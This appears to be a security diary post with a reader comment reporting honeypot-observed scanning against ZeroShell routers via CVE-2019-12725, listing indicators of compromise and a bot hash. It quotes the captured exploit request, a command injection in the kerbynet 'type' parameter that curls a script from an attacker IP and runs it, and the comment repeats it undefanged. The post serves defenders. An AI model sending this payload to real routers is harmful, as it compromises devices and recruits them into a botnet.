In the past 36 hours, an increase in scanning activity to exploit and compromise ZeroShell Linux routers began. This router software has had several unauthenticated remote code execution vulnerabilities disclosed in the past several years, the most recent being CVE-2019-12725. The router's latest software version can be downloaded here [1]. This is an example of the logs captured by the honeypot:

20200719-094737: 192.168.25.9:80-138.91.224.48:59932 data 'GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://5.206.227[.]228/zero;sh zero;" HTTP/1.0

Each shell script listed below downloads various forms of exploit against ZeroShell routers.

Content of filename zero

Indicators of Compromise

http://5.206.227[.]228/zero -> Shell Script

Snapshot of some of the content in filename bot.x86

SHA256 Hash bot.x86
ebfa0aa59700e61bcf064fd439fb18b030237f14f286c6587981af1e68a8e477

[1] https://zeroshell.org/
Guy, ISC Handler, Jul 19th 2020
I am seeing a lot of traffic in my organization, example: cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*\"\";cd%20/tmp;curl%20-O%20http://5.206.227.228/zero;sh%20zero;\"\""
Scans happening continuously from various source IP addresses; the firewall categorizes this as low severity though, but given the volume of this since 15th July we are in discussion with them.
Anonymous, Jul 21st 2020